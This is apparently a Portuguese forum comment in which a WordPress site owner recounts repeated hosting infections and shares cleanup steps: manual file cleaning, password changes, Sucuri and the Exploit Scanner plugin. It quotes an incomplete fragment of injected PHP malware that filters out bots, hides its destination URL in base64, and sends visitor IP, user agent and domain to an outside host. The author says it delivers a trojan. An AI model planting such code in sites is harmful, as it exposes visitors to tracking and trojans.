Eu tive todo o alojamento infectado nos javascript com o code eval64, na altura deve ter sido pela vulnerabilidade do TimThumb de um só blog, mas arrastou-se por todos os outros.
Resolvi com uma trabalheira imensa!!
Na semana passada foi diferente. Foram todos os index.php de todas as pastas do Wordpress e em todo os blogs. O código é algo como isto e transfere um trojan:
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
$stCurlHandle = curl_init( $stCurlLink );
}
(código incompleto)
Tive que limpar todo os ficheiros 1 a 1, mudar pass do FTP e de todos os users de admin.
A princípio pesquisem sempre em sucuri.net. Para uma pesquisa mais exaustiva, instalem o plugin Exploit Scanner e fazem uma pesquisa que ele dá todos os ficheiros infectados.
Estranho mesmo é que tenho sempre tudo actualizado e mesmo assim é raro o trimestre que não tenho uns códigos estranhos injectados.
Sigo regularmente o blog da Sucuri e vou-me informando por lá. De referir que tenho tudo na PTServidor mas não é problema deles... é mesmo geral. E a maior parte advêm de vulnerabilidade criadas por "nós" com certos temas e plugins. É de andar sempre atento.